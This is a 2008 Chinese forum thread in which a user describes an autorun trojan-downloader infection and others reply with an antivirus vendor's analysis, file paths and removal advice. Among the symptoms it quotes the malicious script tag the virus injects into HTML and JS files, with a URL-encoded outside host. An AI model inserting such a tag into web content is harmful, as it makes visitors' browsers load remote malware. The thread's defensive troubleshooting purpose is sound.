您的位置：程序门 -> windows专区 -> 安全技术/病毒

好牛b的病毒~

[收藏此页] [打印本页]选择字色：背景色：字体：[大][中][小]

好牛b的病毒~[已结贴,结贴人:p_hu]

发表于：2008-01-06 00:03:08 楼主

不知道怎么就染上了病毒，开始是网页上有广告，类似qq弹出的新闻，以为是网站做的广告，没在意。

后来感觉不对了，居然上微软的网站也有了这些东西。

于是准备杀毒，才发现天网，金山网镖都自动关掉了。

启动里面出来个~.exe，进入文件夹选项，发现“ 隐藏受保护的操作系统文件（推荐)”项目不见了。

删除后又重起后又会出来

把c盘重装系统，再装别的软件，发现病毒又来了。

只好带毒上网查相关资料，下了个arswp 居然一打开就自动关闭了，查到一些相关的杀毒的网页也会自动关闭，晕s

现象：
1、在每个磁盘根目录下生成文件。病毒会在每个磁盘根目录下生成autorun.inf以及pagefile.pif文件
2、c:\windows\system32\com目录下生成netcfg.dll、smss.exe、lsass.exe、netcfg.000等文件，自动下载alg.exe在dirvers目录下
3、破坏安全模式，使用户无法进入安全模式进行系统修复
4、感染rar.exe 文件
5、文件夹选项，隐藏“ 隐藏受保护的操作系统文件（推荐)”项目
6、修改所有html,js文件，加上 <script src="http://%6a%73%2e%6b%30%31%30%32%2e%63%6f%6d/%30%31%2e%61%73%70"> </script> 等连接。
7、启动项里放入文件 ~.exe.46566 之类，后面的数字会改变

不知道还有没有别的地方，我用光盘启动 dos（我的系统win2000,fat32)，把上述相关文件去掉隐藏系统属性，手工删除。
断掉网络重起后依然又出来了。

没办法，再进入dos，删除上述相关病毒文件，再format c:，重装系统，才暂时安宁了。

有没有人研究过这种病毒，他是用什么方法启动的呢？启动项，注册表里好象都没有~~~~

发表于：2008-01-06 11:01:401楼得分:2

你居然同时安装了天网和金山网镖呢？没事的。杀软么，总是要被病毒搞的

发表于：2008-01-06 12:56:442楼得分:0

做了个小程序，处理了html,js文件中的那些小垃圾。

今天安装一些应用软件，晕，突然发现病毒又卷土重来了。

是不是还感染了一些执行文件.exe呢

又重装！不敢相信自己系统盘之外的程序了~~

发表于：2008-01-06 14:10:303楼得分:2

google搜索“autorun.inf病毒专杀”

发表于：2008-01-06 14:13:214楼得分:0

搜到毒霸论坛上的解决方案帖出来供大家参考

http://bbs.duba.net/thread-21847173-1-1.html

最新auto病毒变种的分析和解决方案
病毒全名 win32.troj.autorun.te.v
病毒长度 89280
威胁级别 ★★
中文名称 auto特务89280
病毒类型木马下载器
病毒简介这是一个auto病毒。病毒成功运行后，会在各盘中生成具有隐藏属性的auto病毒，注册表被病毒修改后，具有隐藏属性的文件无法查看。众多启动项被病毒删除，包括杀软、系统的启动项，这样会导致机器重启后，杀软失效，使用户机器安全性大大降低。而且该病毒还有破坏安全模式、下载病毒的功能。
标志：auto病毒,隐藏文件,破坏安全模式,arp欺骗

病毒行为

1.病毒运行后，生成以下病毒文件
%temp%\rarsfx0（系统临时文件，开始、运行、输入%temp%可打开该文件夹，可使用清理专家的垃圾文件清理功能删除，删除不掉的文件，可能是正在运行中。）
%windows%\system32\com\lsass.exe
%windows%\system32\com\netcfg.000
%windows%\system32\com\netcfg.dll
%windows%\system32\com\smss.exe
%local settings%\temporary internet files\content.ie5\ec5ukr17\r[1].htm
%local settings%\temporary internet files\content.ie5\gr8i0noh\caynka2y.htm

2.在各盘中生成auto病毒，包括病毒文件pagefile.pif和autorun.inf辅助文件，都具有隐藏属性。

3.病毒会修改注册表，使系统的隐藏功能失效，用户无法操控，只要具有隐藏属性的文件将无法显示。

4.查看启动项，异常的发现启动项中许多系统启动项都被自动删除，包括毒霸的启动项。

5.由于启动项被删除，再使用反间谍的隐蔽软件扫描，也就可以看到有两个隐蔽软件，分别是："异常的autorun.inf"和"broken safeboot",broken safeboot很明显是破坏安全模式的，这样会使用户中了该病毒以后无法进入安全模式。

6.该病毒还会引发arp欺骗，导致在同一局域望网内的机器都有被欺骗的可能，明显的症状是：网络时常断开，会有病毒下载到总arp的机器。

解决方案：
1.将以下文件使用清理专家彻底删除
%temp%\rarsfx0（系统临时文件，开始、运行、输入%temp%可打开该文件夹，可使用清理专家的垃圾文件清理功能删除，删除不掉的文件，可能是正在运行中。）
%windows%\system32\com\lsass.exe（下面这4个文件可以用清理专家的粉碎器搞定）
%windows%\system32\com\netcfg.000
%windows%\system32\com\netcfg.dll
%windows%\system32\com\smss.exe
%local settings%\temporary internet files\content.ie5\ec5ukr17\r[1].htm（病毒藏在ie缓存文件夹中，清理专家清理垃圾文件或删除隐私信息的功能也可以快速清空该文件夹）
%local settings%\temporary internet files\content.ie5\gr8i0noh\caynka2y.htm

2.重启电脑，再运行清理专家，在系统修复中，把引用以上几个文件的加载项全部清除。
3.清理专家的恶意软件查杀功能，可以同时修复被破坏的安全模式。

预防措施：
1.auto类病毒，都是利用移动存储介质的自动播放功能传播的。强烈建议使用金山清理专家或毒霸禁用自动播放功能。
2.修补操作系统漏洞、ie漏洞、常用播放器的漏洞，防止病毒通过系统漏洞入侵
3.及时升级杀毒软件。

发表于：2008-01-07 12:48:095楼得分:2

如果没有重要的东西话，介意把系统全部格式化，在装系统，那样会有用的

发表于：2008-01-07 17:19:316楼得分:2

记住一点，重装了系统后，不要直接双击打开我的电脑c盘以外的分驱，用资源管理器的左边一个盘一个盘的点，
查看隐藏文件，将auto那些文件删除，还有伪回收站的文件夹里面的内容，

几个盘里面的都删除以后，不要多点别的，点开始重启

反正记住一点了，d，e，f这些分区是不能双击进去的，双击就中招，开始扩散。

安装
360安全卫士和卡巴，

进入安全模式全盘杀毒，

发表于：2008-01-07 22:57:057楼得分:2

看起来像av杀手的变种

这类病毒一般使用了映像劫持，shellＥＸＥＣutehook, bho, autorun.inf等技术，请除起来比较麻烦

可以试试drweb cureit!

发表于：2008-01-08 15:09:178楼得分:2

好像在那里看过。。。
就改了杀毒软件的名字
那个是趋势的着个是金山的。。。
是不是在给自己做广告呀~`

发表于：2008-01-09 10:19:149楼得分:2

别的盘也有病毒

发表于：2008-01-13 04:42:4010楼得分:2

换个卡巴杀杀试试

发表于：2008-01-14 20:31:4511楼得分:2

杀软么，总是要被病毒搞的

发表于：2008-01-15 01:53:2612楼得分:2

呵呵我现在移动硬盘里还养着病毒呢呵呵只要没事就留着吧呵纪念了

发表于：2008-01-15 11:01:3713楼得分:0

该回复于2008-01-15 11:22:56被管理员删除

其他资讯